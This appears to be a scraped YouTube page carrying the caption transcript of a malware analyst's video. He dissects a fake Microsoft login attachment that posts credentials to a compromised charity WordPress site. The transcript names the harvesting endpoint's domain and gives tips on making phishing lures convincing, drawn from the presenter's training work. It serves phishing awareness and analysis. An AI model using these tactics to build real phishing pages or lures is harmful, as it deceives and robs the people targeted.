FAKE Microsoft Login to Hacked Charity Scam

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

I received this email and I was sent this email from someone who received this email themselves so their email addresses are redacted but they saw this email of Microsoft cooperation team copyright 2023 all in green here Microsoft 2023 noticed we the Microsoft are updating operation on all email accounts so please kindly verify updating their email address for proper usage and function as attached file still with me verify their email by following the instruction in the above file note in 24 hours this account will be deactivated if not then verified obviously this is a bit of a phishing email this is a scam This Is A Lie this is deception but you probably already knew that of course they're including this cheesy hey Microsoft respect your privacy here's their address try to look legitimate but it doesn't look all that legitimate anyway they have attached a file that I received and let's go ahead and explore that now I am over here in remnox the reverse engineering malware Linux distribution I can go and control alt t on my keyboard to open up a terminal f11 to full screen that and I'll scroll and zoom in with control in the mouse wheel here now I've created a directory for us to go ahead and work with called verify and in this director I have this file verify the redacted email address dot shtml now note the dot shtml file extension doesn't really matter it is still an HTML or hypertext Market language document anyway something that will be opened up in your web browser as this is the same language that a whole lot of websites use and and this is exactly what the heck this thing looks like if I use Firefox just to open this up in a web browser this is it this is the Microsoft login for a lot of their online Cloud whatever stuff whether it's o365 or anything right trying to log in to a Microsoft account of course they had filled in and autofilled the email address that I've redacted but I don't know maybe that just adds to The Lure adds a little bit of a hook like oh you're naturally meant to log in here obviously you could enter your password but it is a credential Harvester obviously it's all a lie it's all a trap it's all for you to enter your password and your credentials and maybe there's I don't know maybe a thought that oh this is super targeted because it has their email address well no it they would have already had the email address whatever threat actor and hacker adversary because they emailed this to the person anyway like that's part of the campaign they can build and bundle these and send them out in Mass if we hover over the can't access your account click here button that is just an anchor tag it doesn't really go anywhere that's a lie the next button will submit this form but that doesn't have any specific button and Link set to it so we could go ahead and analyze this we can take apart what the heck this thing is let's open up our HTML document in our Sublime Text text editor or whatever text editor we might like and it is of course HTML right regular doctype here but scrolling down it looks pretty bloody and pretty bad you can see there are a whole bunch of red or pink or whatever color that might be in Sublime Text for broken lines lots of new line characters all seemingly at this like I don't know 20 80 80 ruler for like a terminal printout that's very weird but it's breaking a whole lot of stuff like these links or pages and I don't know if it was originally like that it has a new line after every other line or maybe this is just some byproduct of that person individually sending it to me but ultimately the page still loads it like it rendered just fine I don't know what might be broken here though so what I would try to do is replace all these new lines like a backslash n with regular Expressions enabled and just replace them with nothing with an empty string so they're all deleted all the Control Alt Enter on my keyboard so that way they are all going to be removed takes a little bit Sublime Text is choking through it but it works and looks good now I can go ahead and save this as like a no new lines dot shtml we could open that thing up and here it is basically the exact same page but I guess it got one of the background images to load just fine ultimately this looks super duper gross though and it's like raw HTML form because it's all crammed into one line but we could probably just beautify this with like an online beautifier or something easy I'll grab this thing we can paste it in go ahead and beautify that HTML let's save this in a new page we can call it like cleaned.html or so right now thankfully this cleaned all of the JavaScript or the client-side code aside from the HTML present in the document and naturally I would try to look through this to see oh is it doing any Ajax or like xhml whatever XML hdp request response Shenanigans here but noticeably all of these are meant to be designed off of the real regular Microsoft o365 login right so you can see some links some h GDP references all referring to maybe like the aacdn like actual Microsoft images and pictures and all but take a look the form here where they actually enter their email address whatever username and password to log in note that that form is going to end up posting towards this https series sangabowfoundation.org images with an extra s sharepoints.php uh presumably share point but with an f and it's posting to this location um and that's not Microsoft now Drive the point home once more this is a credential Harvester it's waiting for you to input your username and password and it'll just get sent right over to that website that will be harvesting logging them giving access to whatever threat actor hacker or bad person behind it waiting to collect as much as it can now we can go ahead and take a look at this website let's go see can we go access SharePoint over in our web browser let's go ahead and paste that in here actually this might not have even been in an issue like the user who received this email and sent it to me maybe they just wouldn't have even gotten it if they had some email filtering set up on their email provider or like the anti-spam detection and phishing prevention and actually our sponsor has all that and more and I'd love to fill you in on proton email compromise is a constant threat within today's cyber security landscape the best defense is leaning into privacy and security by Design having security baked into software you use proton offers encrypted services that help you work towards a better internet proton provides easy to use encrypted email calendar file storage and VPN access built on the principle of your data and your rules cyber security starts with encrypted emails and with protons Technologies like fishguard smart spam detection and anti-spoofing you remain secure alongside 100 million people trusting proton to protect their online data best of all you can use proton for free whether or not it's email calendars drive or VPN you can use an open source and independently audited software solution that keeps you safe personally I use protonmail for communication that I want to remain private and when doing security research proton VPN is my preferred choice for staying anonymous online get privacy by default with proton and stop other companies from exploding your data you can get started with proton for free at proton dot me slash John huge thanks to proton on for sponsoring this video go ahead and paste that in here and I'll full screen this but okay we got a 404 404 HTTP Response Code of our page not found however let me add a specific node here this could still be a lie because the back end web server like the application the language the program the code running in the background for the website could still say hey that page is not found 404 but it's programmed to just say that it's a putting that sign up but it could still be doing whatever it wants processing that request in the background maybe it will just take whatever is passed in as HTTP arguments the variables that you add in your post request just store them in a file or log them or send them someplace else this 404 might just be lying to us now we don't know that for sure right there's no way to know without having that access to the server and the code here but it still leaves some suspicion I'm curious though obviously like we're going to share points with an F dot PHP is that like a fake page can I go to Sure Point does that exist no no still a 404 what about images that says extra S no I don't know if directory listing will be on we'll be able to see the files in there no it's not but another 404. how about just regular images can we see anything that might be indexed in that no uh okay so I guess we'll just go to the home page see what the heck this thing is uh oh okay Let's Build a Better World Together this looks pretty wholesome this looks good like it oh boasts a charity it's a good thing but what is this text oh this is a carousel okay I'm dragging to get to a new one your small help can make a difference also nonsense garbage text uh that's lorem ipsum right by the way I'm sorry for folks that don't know um Laura mipsum is like those like filler text like things that just like take space to look like there's actual content there used by like creative people like designers or website front-end folks that'll try to fill space and look like there's material there but there's not it's all decoy lie just to like look like something like they say Okay location in Sri Lanka we got a Gmail address up here and a phone number I don't know if that's legitimate or not maybe we could call that number look it up I don't know if that area code is right but the read more button is another anchor tag you can see down the bottom left that just takes us right back to this page so nothing um let's make a difference today lorem ipsum lorem ipsum literally copy and paste it join us now is an anchor tag again bring the right page become a partner donate now seems to take us to a donation from page and the same thing with the Donate fund link up here yeah yeah donate now again at the very very top right that one is broken though that's an anchor tag wait where are we going where are we going same page what else is here our work promised to uphold the trust place that is a JPEG oh man give me some more pixels jpeg wow uh look at this 28 years of experience with Porter tempura facili hack donate to charity all around the world wow okay we raised 8 500 as of June 2021 but it it passed uh this is like sad this is like kind of not okay if it's like a fake lying to you charity Foundation enter and maybe get some more email addresses they will just give you uh play a short video ooh we got YouTube here videos unavailable okay videos no longer available because the YouTube account associated with this video has been terminated I wonder why uh questions for us to think on tonight we funded a whole lot of projects but it's look at the footer the footer is all Laura mipson it's all lorem ipsum contact info is just flat lower nipsom contact us info domain.com become a volunteer email just registered example.com this is sus copyright 2023 powered by Bosa themes Bosa I thought Bosa was the name of the website or like it had that same icon it's just like a completely ripped theme it's a WordPress theme right so WordPress website as we could probably assume by like the look of blogs in there but look like okay this looks identical to the same page we were just on it's just it's just whatever anyway is that that donate from page was seemingly a real thing though can we go to that donate from I'm assuming it's supposed to be a donate form right support our cause help organization by donating today okay this looks kind of real donate now yeah how much you want to donate I oh I'm so conflicted because I don't know if this is like a real genuine actual charity or it's just lies are they just drifting money off of this that's so gross what is this phone number like can we call that number or can we like go look for that number let me Google this not a whole lot out there of course the exact same page we're on and then a donation failed Pages cached from 2021 still so this thing's been out for a while does it just like redirect you to a donation failed after you've actually genuinely donated or like willingly gave money to something like asking you to donate again in like a broken contrived way ah that still feels sus and it still feel like that I don't know if this it is a WordPress site like if we go to WP content can we get some more stuff here WordPress icon you can see right up at the very top okay WP content doesn't work but there are posts charity to education for needy people Laura mipsum useless but look if I go to like uh WP admin for like the WordPress admin it is undeniably a WordPress website is it like default admin admin I don't know okay I probably shouldn't do that so if you ask me this is more than likely a compromised WordPress site as WordPress websites just tend to get hacked and breached in incidents all the time uh because of like whatever vulnerable plugins or themes or Crap folks add to it but I'm assuming this is probably maybe a potentially what would have been a real or what was a genuine charity or actual wholesome Foundation page that was compromised and now I don't know is just lost to the ether of some threat actor hacker bad person that is okay locked it down made this garbage page with a theme uh asking for donations trying to retrieve money and having some credential Harvester set up through these emails that it might send out with fake Microsoft logins the thing is though this this is a dumb phishing email like this is bad this is literally everything that they tell you and like it's a computer security phishing awareness training 101 right like look for weird uh I don't know Green text like a big banner that does is not Microsoft colors that's not part of their brand or color palette broken English uh typos here and there obviously an email address that doesn't make sense you should not fall for this no one should fall for this right maybe I don't know some folks might happen to if they're moving quick or if they just aren't educated in the mix on all this stuff but look I feel like in today's world right cyber criminals or threat actors or hacker folks can really up the ante on the lure and the bait and the hook here like if I may I I I send phishing emails like as part of my job I we do Education and Training and user awareness and I craft and create phishing emails to try and fool someone so that they can simulate a fishing exercise and we can get better and improve and bolster security for the right reasons so when I craft a phishing email I want to make something that more people will click on because it seems more likely more realistic and more probable and I'm not I don't want to have any of those typos or broken English or weird stuff and I want to properly impersonate maybe the vendor or the provider that I am masquerading as so this is one that I built out and I try to make it as realistic as possible so to speak hey obviously this looks like the Southwest Airline provider and I say hey John look I've got your name I got randomly generated rewards number ticket number and a confirmation from one airport to the next and so look I say hey your flight has been canceled now this might be weird to someone they might be like wait a second I don't even have a flight what the heck's going on let me go make sure with my account that this is all good or they say oh shoot I'm actually traveling what the heck's going on I don't know they might see this reservation and say that's not right at all they'll want to go update the reservation click on the big link and that is the compromise so let me ask you I don't know are you more than likely to click on this that looks real as something like the Microsoft 2023 notice all in green text I know there's meant to be the sense of urgency but if something affects their lives like oh your hotel room has been canceled or whoops we're changing our work from home policy and you must be in the office every day apologies to those who do people are going to click on that they're going to open the PDF that you send when they say hey here's my resume for my job interview HR I'm sorry I'm rambling I know I'm getting a little bit heated but hey I hope this was fun I hope it was kind of cool I hope it was a good little exploration of a credential Harvester faking spoofing and impersonating a real Microsoft login and then some weird wacky compromised potential WordPress site just asking for money thanks so much for watching everyone hope you enjoyed it if you did please do like comment subscribe to all those YouTube algorithm things and maybe look you wouldn't get that fishing meal in the first place maybe you've got that email filtering maybe you're hooked up with our sponsor here hope you go take a look at proton thanks everyone I'll see in the next one

Info

Channel: John Hammond

Views: 24,435

Rating: undefined out of 5

Keywords: cybersecurity, learn, programming, coding, capture the flag, ctf, malware, analysis, dark web, how to learn cybersecurity, beginners

Id: 3Vy2l1kv7Cc

Channel Id: undefined

Length: 15min 56sec (956 seconds)

Published: Thu Jun 08 2023